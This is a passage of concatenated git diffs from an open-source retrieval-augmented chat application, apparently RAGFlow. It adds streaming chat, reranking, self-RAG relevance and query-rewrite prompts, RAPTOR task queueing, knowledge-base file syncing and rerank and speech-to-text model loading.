@ -57,36 +62,54 @@ def message_fit_in(msg, max_length=4000):
if c < max_length:
return c, msg
ll = num_tokens_from_string(msg_[0].content)
l = num_tokens_from_string(msg_[-1].content)
ll = num_tokens_from_string(msg_[0]["content"])
l = num_tokens_from_string(msg_[-1]["content"])
if ll / (ll + l) > 0.8:
m = msg_[0].content
m = msg_[0]["content"]
m = encoder.decode(encoder.encode(m)[:max_length - l])
msg[0].content = m
msg[0]["content"] = m
return max_length, msg
m = msg_[1].content
m = msg_[1]["content"]
m = encoder.decode(encoder.encode(m)[:max_length - l])
msg[1].content = m
msg[1]["content"] = m
return max_length, msg
def chat(dialog, messages, **kwargs):
def llm_id2llm_type(llm_id):
fnm = os.path.join(get_project_base_directory(), "conf")
llm_factories = json.load(open(os.path.join(fnm, "llm_factories.json"), "r"))
for llm_factory in llm_factories["factory_llm_infos"]:
for llm in llm_factory["llm"]:
if llm_id == llm["llm_name"]:
return llm["model_type"].strip(",")[-1]
def chat(dialog, messages, stream=True, **kwargs):
assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
llm = LLMService.query(llm_name=dialog.llm_id)
if not llm:
llm = TenantLLMService.query(tenant_id=dialog.tenant_id, llm_name=dialog.llm_id)
if not llm:
raise LookupError("LLM(%s) not found" % dialog.llm_id)
max_tokens = 1024
else: max_tokens = llm[0].max_tokens
max_tokens = 8192
else:
max_tokens = llm[0].max_tokens
kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
embd_nms = list(set([kb.embd_id for kb in kbs]))
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
if len(embd_nms) != 1:
yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
is_kg = all([kb.parser_id == ParserType.KG for kb in kbs])
retr = retrievaler if not is_kg else kg_retrievaler
questions = [m["content"] for m in messages if m["role"] == "user"]
embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)
if llm_id2llm_type(dialog.llm_id) == "image2text":
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.IMAGE2TEXT, dialog.llm_id)
else:
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)
prompt_config = dialog.prompt_config
field_map = KnowledgebaseService.get_field_map(dialog.kb_ids)
@ -94,7 +117,9 @@ def chat(dialog, messages, **kwargs):
if field_map:
chat_logger.info("Use SQL to retrieval:{}".format(questions[-1]))
ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
if ans: return ans
if ans:
yield ans
return
for p in prompt_config["parameters"]:
if p["key"] == "knowledge":
@ -105,58 +130,93 @@ def chat(dialog, messages, **kwargs):
prompt_config["system"] = prompt_config["system"].replace(
"{%s}" % p["key"], " ")
rerank_mdl = None
if dialog.rerank_id:
rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
for _ in range(len(questions) // 2):
questions.append(questions[-1])
if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
else:
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
if prompt_config.get("keyword", False):
questions[-1] += keyword_extraction(chat_mdl, questions[-1])
kbinfos = retr.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
dialog.similarity_threshold,
dialog.vector_similarity_weight, top=1024, aggs=False)
dialog.vector_similarity_weight,
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
#self-rag
if dialog.prompt_config.get("self_rag") and not relevant(dialog.tenant_id, dialog.llm_id, questions[-1], knowledges):
questions[-1] = rewrite(dialog.tenant_id, dialog.llm_id, questions[-1])
kbinfos = retr.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
dialog.similarity_threshold,
dialog.vector_similarity_weight,
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
chat_logger.info(
"{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
if not knowledges and prompt_config.get("empty_response"):
return {
"answer": prompt_config["empty_response"], "reference": kbinfos}
yield {"answer": prompt_config["empty_response"], "reference": kbinfos}
return {"answer": prompt_config["empty_response"], "reference": kbinfos}
kwargs["knowledge"] = "\n".join(knowledges)
gen_conf = dialog.llm_setting
msg = [{"role": m["role"], "content": m["content"]}
for m in messages if m["role"] != "system"]
msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
msg.extend([{"role": m["role"], "content": m["content"]}
for m in messages if m["role"] != "system"])
used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
assert len(msg) >= 2, f"message_fit_in has bug: {msg}"
if "max_tokens" in gen_conf:
gen_conf["max_tokens"] = min(
gen_conf["max_tokens"],
max_tokens - used_token_count)
answer = chat_mdl.chat(
prompt_config["system"].format(
**kwargs), msg, gen_conf)
chat_logger.info("User: {}|Assistant: {}".format(
msg[-1]["content"], answer))
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
answer, idx = retrievaler.insert_citations(answer,
[ck["content_ltks"]
for ck in kbinfos["chunks"]],
[ck["vector"]
for ck in kbinfos["chunks"]],
embd_mdl,
tkweight=1 - dialog.vector_similarity_weight,
vtweight=dialog.vector_similarity_weight)
idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
recall_docs = [
d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
kbinfos["doc_aggs"] = recall_docs
def decorate_answer(answer):
nonlocal prompt_config, knowledges, kwargs, kbinfos
refs = []
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
answer, idx = retr.insert_citations(answer,
[ck["content_ltks"]
for ck in kbinfos["chunks"]],
[ck["vector"]
for ck in kbinfos["chunks"]],
embd_mdl,
tkweight=1 - dialog.vector_similarity_weight,
vtweight=dialog.vector_similarity_weight)
idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
recall_docs = [
d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
kbinfos["doc_aggs"] = recall_docs
for c in kbinfos["chunks"]:
if c.get("vector"):
del c["vector"]
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api")>=0:
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
return {"answer": answer, "reference": kbinfos}
refs = deepcopy(kbinfos)
for c in refs["chunks"]:
if c.get("vector"):
del c["vector"]
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
return {"answer": answer, "reference": refs}
if stream:
answer = ""
for ans in chat_mdl.chat_streamly(msg[0]["content"], msg[1:], gen_conf):
answer = ans
yield {"answer": answer, "reference": {}}
yield decorate_answer(answer)
else:
answer = chat_mdl.chat(
msg[0]["content"], msg[1:], gen_conf)
chat_logger.info("User: {}|Assistant: {}".format(
msg[-1]["content"], answer))
yield decorate_answer(answer)
def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
@ -179,7 +239,7 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
def get_table():
nonlocal sys_prompt, user_promt, question, tried_times
sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_promt}], {
"temperature": 0.06})
"temperature": 0.06})
print(user_promt, sql)
chat_logger.info(f"{question}”==>{user_promt} get SQL: {sql}")
sql = re.sub(r"[\r\n]+", " ", sql.lower())
@ -248,17 +308,19 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
# compose markdown table
clmns = "|" + "|".join([re.sub(r"(/.*|[^]+)", "", field_map.get(tbl["columns"][i]["name"],
tbl["columns"][i]["name"])) for i in clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
tbl["columns"][i]["name"])) for i in
clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
("|------|" if docid_idx and docid_idx else "")
("|------|" if docid_idx and docid_idx else "")
rows = ["|" +
"|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
"|" for r in tbl["rows"]]
if quota:
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
else: rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
else:
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)
if not docid_idx or not docnm_idx:
@ -278,5 +340,46 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
return {
"answer": "\n".join([clmns, line, rows]),
"reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in doc_aggs.items()]}
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in
doc_aggs.items()]}
}
def relevant(tenant_id, llm_id, question, contents: list):
if llm_id2llm_type(llm_id) == "image2text":
chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
else:
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
prompt = """
You are a grader assessing relevance of a retrieved document to a user question.
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
No other words needed except 'yes' or 'no'.
"""
if not contents:return False
contents = "Documents: \n" + " - ".join(contents)
contents = f"Question: {question}\n" + contents
if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
if ans.lower().find("yes") >= 0: return True
return False
def rewrite(tenant_id, llm_id, question):
if llm_id2llm_type(llm_id) == "image2text":
chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
else:
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
prompt = """
You are an expert at query expansion to generate a paraphrasing of a question.
I can't retrieval relevant information from the knowledge base by using user's question directly.
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
changing the way of expression, translating the original question into another language (English/Chinese), etc.
And return 5 versions of question and one is from translation.
Just list the question. No other words are needed.
"""
ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
return ans

View File

@ -16,9 +16,12 @@
import random
from datetime import datetime
from elasticsearch_dsl import Q
from peewee import fn
from api.db.db_utils import bulk_insert_into_db
from api.settings import stat_logger
from api.utils import current_timestamp, get_format_time
from api.utils import current_timestamp, get_format_time, get_uuid
from rag.settings import SVR_QUEUE_NAME
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
from rag.nlp import search
@ -29,6 +32,7 @@ from api.db.db_models import Document
from api.db.services.common_service import CommonService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db import StatusEnum
from rag.utils.redis_conn import REDIS_CONN
class DocumentService(CommonService):
@ -40,8 +44,9 @@ class DocumentService(CommonService):
orderby, desc, keywords):
if keywords:
docs = cls.model.select().where(
cls.model.kb_id == kb_id,
cls.model.name.like(f"%%{keywords}%%"))
(cls.model.kb_id == kb_id),
(fn.LOWER(cls.model.name).contains(keywords.lower()))
)
else:
docs = cls.model.select().where(cls.model.kb_id == kb_id)
count = docs.count()
@ -54,6 +59,35 @@ class DocumentService(CommonService):
return list(docs.dicts()), count
@classmethod
@DB.connection_context()
def list_documents_in_dataset(cls, dataset_id, offset, count, order_by, descend, keywords):
if keywords:
docs = cls.model.select().where(
(cls.model.kb_id == dataset_id),
(fn.LOWER(cls.model.name).contains(keywords.lower()))
)
else:
docs = cls.model.select().where(cls.model.kb_id == dataset_id)
total = docs.count()
if descend == 'True':
docs = docs.order_by(cls.model.getter_by(order_by).desc())
if descend == 'False':
docs = docs.order_by(cls.model.getter_by(order_by).asc())
docs = list(docs.dicts())
docs_length = len(docs)
if offset < 0 or offset > docs_length:
raise IndexError("Offset is out of the valid range.")
if count == -1:
return docs[offset:], total
return docs[offset:offset + count], total
@classmethod
@DB.connection_context()
def insert(cls, doc):
@ -68,27 +102,12 @@ class DocumentService(CommonService):
raise RuntimeError("Database error (Knowledgebase)!")
return doc
@classmethod
@DB.connection_context()
def delete(cls, doc):
e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
if not KnowledgebaseService.update_by_id(
kb.id, {"doc_num": kb.doc_num - 1}):
raise RuntimeError("Database error (Knowledgebase)!")
return cls.delete_by_id(doc.id)
@classmethod
@DB.connection_context()
def remove_document(cls, doc, tenant_id):
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
cls.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not cls.delete(doc):
raise RuntimeError("Database error (Document removal)!")
MINIO.rm(doc.kb_id, doc.location)
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
cls.clear_chunk_num(doc.id)
return cls.delete_by_id(doc.id)
@classmethod
@ -123,7 +142,7 @@ class DocumentService(CommonService):
@classmethod
@DB.connection_context()
def get_unfinished_docs(cls):
fields = [cls.model.id, cls.model.process_begin_at]
fields = [cls.model.id, cls.model.process_begin_at, cls.model.parser_config, cls.model.progress_msg, cls.model.run]
docs = cls.model.select(*fields) \
.where(
cls.model.status == StatusEnum.VALID.value,
@ -149,6 +168,41 @@ class DocumentService(CommonService):
chunk_num).where(
Knowledgebase.id == kb_id).execute()
return num
@classmethod
@DB.connection_context()
def decrement_chunk_num(cls, doc_id, kb_id, token_num, chunk_num, duation):
num = cls.model.update(token_num=cls.model.token_num - token_num,
chunk_num=cls.model.chunk_num - chunk_num,
process_duation=cls.model.process_duation + duation).where(
cls.model.id == doc_id).execute()
if num == 0:
raise LookupError(
"Document not found which is supposed to be there")
num = Knowledgebase.update(
token_num=Knowledgebase.token_num -
token_num,
chunk_num=Knowledgebase.chunk_num -
chunk_num
).where(
Knowledgebase.id == kb_id).execute()
return num
@classmethod
@DB.connection_context()
def clear_chunk_num(cls, doc_id):
doc = cls.model.get_by_id(doc_id)
assert doc, "Can't fine document in database."
num = Knowledgebase.update(
token_num=Knowledgebase.token_num -
doc.token_num,
chunk_num=Knowledgebase.chunk_num -
doc.chunk_num,
doc_num=Knowledgebase.doc_num-1
).where(
Knowledgebase.id == doc.kb_id).execute()
return num
@classmethod
@DB.connection_context()
@ -163,6 +217,43 @@ class DocumentService(CommonService):
return
return docs[0]["tenant_id"]
@classmethod
@DB.connection_context()
def get_tenant_id_by_name(cls, name):
docs = cls.model.select(
Knowledgebase.tenant_id).join(
Knowledgebase, on=(
Knowledgebase.id == cls.model.kb_id)).where(
cls.model.name == name, Knowledgebase.status == StatusEnum.VALID.value)
docs = docs.dicts()
if not docs:
return
return docs[0]["tenant_id"]
@classmethod
@DB.connection_context()
def get_embd_id(cls, doc_id):
docs = cls.model.select(
Knowledgebase.embd_id).join(
Knowledgebase, on=(
Knowledgebase.id == cls.model.kb_id)).where(
cls.model.id == doc_id, Knowledgebase.status == StatusEnum.VALID.value)
docs = docs.dicts()
if not docs:
return
return docs[0]["embd_id"]
@classmethod
@DB.connection_context()
def get_doc_id_by_doc_name(cls, doc_name):
fields = [cls.model.id]
doc_id = cls.model.select(*fields) \
.where(cls.model.name == doc_name)
doc_id = doc_id.dicts()
if not doc_id:
return
return doc_id[0]["id"]
@classmethod
@DB.connection_context()
def get_thumbnails(cls, docids):
@ -220,7 +311,8 @@ class DocumentService(CommonService):
prg = 0
finished = True
bad = 0
status = TaskStatus.RUNNING.value
e, doc = DocumentService.get_by_id(d["id"])
status = doc.run#TaskStatus.RUNNING.value
for t in tsks:
if 0 <= t.progress < 1:
finished = False
@ -233,7 +325,12 @@ class DocumentService(CommonService):
prg = -1
status = TaskStatus.FAIL.value
elif finished:
status = TaskStatus.DONE.value
if d["parser_config"].get("raptor", {}).get("use_raptor") and d["progress_msg"].lower().find(" raptor")<0:
queue_raptor_tasks(d)
prg *= 0.98
msg.append("------ RAPTOR -------")
else:
status = TaskStatus.DONE.value
msg = "\n".join(msg)
info = {
@ -249,3 +346,36 @@ class DocumentService(CommonService):
except Exception as e:
stat_logger.error("fetch task exception:" + str(e))
@classmethod
@DB.connection_context()
def get_kb_doc_count(cls, kb_id):
return len(cls.model.select(cls.model.id).where(
cls.model.kb_id == kb_id).dicts())
@classmethod
@DB.connection_context()
def do_cancel(cls, doc_id):
try:
_, doc = DocumentService.get_by_id(doc_id)
return doc.run == TaskStatus.CANCEL.value or doc.progress < 0
except Exception as e:
pass
return False
def queue_raptor_tasks(doc):
def new_task():
nonlocal doc
return {
"id": get_uuid(),
"doc_id": doc["id"],
"from_page": 0,
"to_page": -1,
"progress_msg": "Start to do RAPTOR (Recursive Abstractive Processing For Tree-Organized Retrieval)."
}
task = new_task()
bulk_insert_into_db(Task, [task], True)
task["type"] = "raptor"
assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=task), "Can't access Redis. Please check the Redis' status."

View File

@ -15,12 +15,12 @@
#
from datetime import datetime
from api.db import FileSource
from api.db.db_models import DB
from api.db.db_models import File, Document, File2Document
from api.db.db_models import File, File2Document
from api.db.services.common_service import CommonService
from api.db.services.document_service import DocumentService
from api.db.services.file_service import FileService
from api.utils import current_timestamp, datetime_format
from api.utils import current_timestamp, datetime_format, get_uuid
class File2DocumentService(CommonService):
@ -71,13 +71,15 @@ class File2DocumentService(CommonService):
@DB.connection_context()
def get_minio_address(cls, doc_id=None, file_id=None):
if doc_id:
ids = File2DocumentService.get_by_document_id(doc_id)
f2d = cls.get_by_document_id(doc_id)
else:
ids = File2DocumentService.get_by_file_id(file_id)
if ids:
e, file = FileService.get_by_id(ids[0].file_id)
return file.parent_id, file.location
else:
assert doc_id, "please specify doc_id"
e, doc = DocumentService.get_by_id(doc_id)
return doc.kb_id, doc.location
f2d = cls.get_by_file_id(file_id)
if f2d:
file = File.get_by_id(f2d[0].file_id)
if file.source_type == FileSource.LOCAL:
return file.parent_id, file.location
doc_id = f2d[0].document_id
assert doc_id, "please specify doc_id"
e, doc = DocumentService.get_by_id(doc_id)
return doc.kb_id, doc.location

View File

@ -16,10 +16,12 @@
from flask_login import current_user
from peewee import fn
from api.db import FileType
from api.db import FileType, KNOWLEDGEBASE_FOLDER_NAME, FileSource
from api.db.db_models import DB, File2Document, Knowledgebase
from api.db.db_models import File, Document
from api.db.services.common_service import CommonService
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.utils import get_uuid
@ -32,11 +34,16 @@ class FileService(CommonService):
orderby, desc, keywords):
if keywords:
files = cls.model.select().where(
(cls.model.tenant_id == tenant_id)
& (cls.model.parent_id == pf_id), (fn.LOWER(cls.model.name).like(f"%%{keywords.lower()}%%")))
(cls.model.tenant_id == tenant_id),
(cls.model.parent_id == pf_id),
(fn.LOWER(cls.model.name).contains(keywords.lower())),
~(cls.model.id == pf_id)
)
else:
files = cls.model.select().where((cls.model.tenant_id == tenant_id)
& (cls.model.parent_id == pf_id))
files = cls.model.select().where((cls.model.tenant_id == tenant_id),
(cls.model.parent_id == pf_id),
~(cls.model.id == pf_id)
)
count = files.count()
if desc:
files = files.order_by(cls.model.getter_by(orderby).desc())
@ -135,29 +142,68 @@ class FileService(CommonService):
@classmethod
@DB.connection_context()
def get_root_folder(cls, tenant_id):
file = cls.model.select().where(cls.model.tenant_id == tenant_id and
cls.model.parent_id == cls.model.id)
if not file:
file_id = get_uuid()
file = {
"id": file_id,
"parent_id": file_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": "/",
"type": FileType.FOLDER.value,
"size": 0,
"location": "",
}
cls.save(**file)
else:
file_id = file[0].id
for file in cls.model.select().where((cls.model.tenant_id == tenant_id),
(cls.model.parent_id == cls.model.id)
):
return file.to_dict()
e, file = cls.get_by_id(file_id)
if not e:
raise RuntimeError("Database error (File retrieval)!")
file_id = get_uuid()
file = {
"id": file_id,
"parent_id": file_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": "/",
"type": FileType.FOLDER.value,
"size": 0,
"location": "",
}
cls.save(**file)
return file
@classmethod
@DB.connection_context()
def get_kb_folder(cls, tenant_id):
for root in cls.model.select().where(
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == cls.model.id)):
for folder in cls.model.select().where(
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == root.id),
(cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)):
return folder.to_dict()
assert False, "Can't find the KB folder. Database init error."
@classmethod
@DB.connection_context()
def new_a_file_from_kb(cls, tenant_id, name, parent_id, ty=FileType.FOLDER.value, size=0, location=""):
for file in cls.query(tenant_id=tenant_id, parent_id=parent_id, name=name):
return file.to_dict()
file = {
"id": get_uuid(),
"parent_id": parent_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": name,
"type": ty,
"size": size,
"location": location,
"source_type": FileSource.KNOWLEDGEBASE
}
cls.save(**file)
return file
@classmethod
@DB.connection_context()
def init_knowledgebase_docs(cls, root_id, tenant_id):
for _ in cls.model.select().where((cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)\
& (cls.model.parent_id == root_id)):
return
folder = cls.new_a_file_from_kb(tenant_id, KNOWLEDGEBASE_FOLDER_NAME, root_id)
for kb in Knowledgebase.select(*[Knowledgebase.id, Knowledgebase.name]).where(Knowledgebase.tenant_id==tenant_id):
kb_folder = cls.new_a_file_from_kb(tenant_id, kb.name, folder["id"])
for doc in DocumentService.query(kb_id=kb.id):
FileService.add_file_from_kb(doc.to_dict(), kb_folder["id"], tenant_id)
@classmethod
@DB.connection_context()
def get_parent_folder(cls, file_id):
@ -241,3 +287,29 @@ class FileService(CommonService):
dfs(folder_id)
return size
@classmethod
@DB.connection_context()
def add_file_from_kb(cls, doc, kb_folder_id, tenant_id):
for _ in File2DocumentService.get_by_document_id(doc["id"]): return
file = {
"id": get_uuid(),
"parent_id": kb_folder_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": doc["name"],
"type": doc["type"],
"size": doc["size"],
"location": doc["location"],
"source_type": FileSource.KNOWLEDGEBASE
}
cls.save(**file)
File2DocumentService.save(**{"id": get_uuid(), "file_id": file["id"], "document_id": doc["id"]})
@classmethod
@DB.connection_context()
def move_file(cls, file_ids, folder_id):
try:
cls.filter_update((cls.model.id << file_ids, ), { 'parent_id': folder_id })
except Exception as e:
print(e)
raise RuntimeError("Database error (File move)!")

View File

@ -1,67 +0,0 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from api.db import TenantPermission
from api.db.db_models import DB, Tenant
from api.db.db_models import Knowledgebase
from api.db.services.common_service import CommonService
from api.db import StatusEnum
class KnowledgebaseService(CommonService):
model = Knowledgebase
@classmethod
@DB.connection_context()
def get_by_tenant_ids(cls, joined_tenant_ids, user_id,
page_number, items_per_page, orderby, desc):
kbs = cls.model.select().where(
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
TenantPermission.TEAM.value)) | (cls.model.tenant_id == user_id))
& (cls.model.status == StatusEnum.VALID.value)
)
if desc:
kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
else:
kbs = kbs.order_by(cls.model.getter_by(orderby).asc())
kbs = kbs.paginate(page_number, items_per_page)
return list(kbs.dicts())
@classmethod
@DB.connection_context()
def get_detail(cls, kb_id):
fields = [
cls.model.id,
Tenant.embd_id,
cls.model.avatar,
cls.model.name,
cls.model.description,
cls.model.permission,
cls.model.doc_num,
cls.model.token_num,
cls.model.chunk_num,
cls.model.parser_id]
kbs = cls.model.select(*fields).join(Tenant, on=((Tenant.id == cls.model.tenant_id)&(Tenant.status== StatusEnum.VALID.value))).where(
(cls.model.id == kb_id),
(cls.model.status == StatusEnum.VALID.value)
)
if not kbs:
return
d = kbs[0].to_dict()
d["embd_id"] = kbs[0].tenant.embd_id
return d

View File

@ -40,6 +40,31 @@ class KnowledgebaseService(CommonService):
return list(kbs.dicts())
@classmethod
@DB.connection_context()
def get_by_tenant_ids_by_offset(cls, joined_tenant_ids, user_id, offset, count, orderby, desc):
kbs = cls.model.select().where(
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
TenantPermission.TEAM.value)) | (
cls.model.tenant_id == user_id))
& (cls.model.status == StatusEnum.VALID.value)
)
if desc:
kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
else:
kbs = kbs.order_by(cls.model.getter_by(orderby).asc())
kbs = list(kbs.dicts())
kbs_length = len(kbs)
if offset < 0 or offset > kbs_length:
raise IndexError("Offset is out of the valid range.")
if count == -1:
return kbs[offset:]
return kbs[offset:offset+count]
@classmethod
@DB.connection_context()
def get_detail(cls, kb_id):
@ -112,3 +137,8 @@ class KnowledgebaseService(CommonService):
if kb:
return True, kb[0]
return False, None
@classmethod
@DB.connection_context()
def get_all_ids(cls):
return [m["id"] for m in cls.model.select(cls.model.id).dicts()]

View File

@ -15,7 +15,7 @@
#
from api.db.services.user_service import TenantService
from api.settings import database_logger
from rag.llm import EmbeddingModel, CvModel, ChatModel
from rag.llm import EmbeddingModel, CvModel, ChatModel, RerankModel, Seq2txtModel
from api.db import LLMType
from api.db.db_models import DB, UserTenant
from api.db.db_models import LLMFactories, LLM, TenantLLM
@ -70,24 +70,28 @@ class TenantLLMService(CommonService):
elif llm_type == LLMType.SPEECH2TEXT.value:
mdlnm = tenant.asr_id
elif llm_type == LLMType.IMAGE2TEXT.value:
mdlnm = tenant.img2txt_id
mdlnm = tenant.img2txt_id if not llm_name else llm_name
elif llm_type == LLMType.CHAT.value:
mdlnm = tenant.llm_id if not llm_name else llm_name
elif llm_type == LLMType.RERANK:
mdlnm = tenant.rerank_id if not llm_name else llm_name
else:
assert False, "LLM type error"
model_config = cls.get_api_key(tenant_id, mdlnm)
if model_config: model_config = model_config.to_dict()
if not model_config:
if llm_type == LLMType.EMBEDDING.value:
llm = LLMService.query(llm_name=llm_name)
if llm and llm[0].fid in ["Youdao", "FastEmbed"]:
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name, "api_base": ""}
if llm_type in [LLMType.EMBEDDING, LLMType.RERANK]:
llm = LLMService.query(llm_name=llm_name if llm_name else mdlnm)
if llm and llm[0].fid in ["Youdao", "FastEmbed", "BAAI"]:
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name if llm_name else mdlnm, "api_base": ""}
if not model_config:
if llm_name == "flag-embedding":
model_config = {"llm_factory": "Tongyi-Qianwen", "api_key": "",
"llm_name": llm_name, "api_base": ""}
else:
if not mdlnm:
raise LookupError(f"Type of {llm_type} model is not set.")
raise LookupError("Model({}) not authorized".format(mdlnm))
if llm_type == LLMType.EMBEDDING.value:
@ -96,6 +100,12 @@ class TenantLLMService(CommonService):
return EmbeddingModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
if llm_type == LLMType.RERANK:
if model_config["llm_factory"] not in RerankModel:
return
return RerankModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
if llm_type == LLMType.IMAGE2TEXT.value:
if model_config["llm_factory"] not in CvModel:
return
@ -110,6 +120,14 @@ class TenantLLMService(CommonService):
return ChatModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
if llm_type == LLMType.SPEECH2TEXT:
if model_config["llm_factory"] not in Seq2txtModel:
return
return Seq2txtModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], lang,
base_url=model_config["api_base"]
)
@classmethod
@DB.connection_context()
def increase_usage(cls, tenant_id, llm_type, used_tokens, llm_name=None):
@ -125,16 +143,31 @@ class TenantLLMService(CommonService):
mdlnm = tenant.img2txt_id
elif llm_type == LLMType.CHAT.value:
mdlnm = tenant.llm_id if not llm_name else llm_name
elif llm_type == LLMType.RERANK:
mdlnm = tenant.llm_id if not llm_name else llm_name
else:
assert False, "LLM type error"
num = 0
for u in cls.query(tenant_id = tenant_id, llm_name=mdlnm):
num += cls.model.update(used_tokens = u.used_tokens + used_tokens)\
.where(cls.model.tenant_id == tenant_id, cls.model.llm_name == mdlnm)\
.execute()
try:
for u in cls.query(tenant_id = tenant_id, llm_name=mdlnm):
num += cls.model.update(used_tokens = u.used_tokens + used_tokens)\
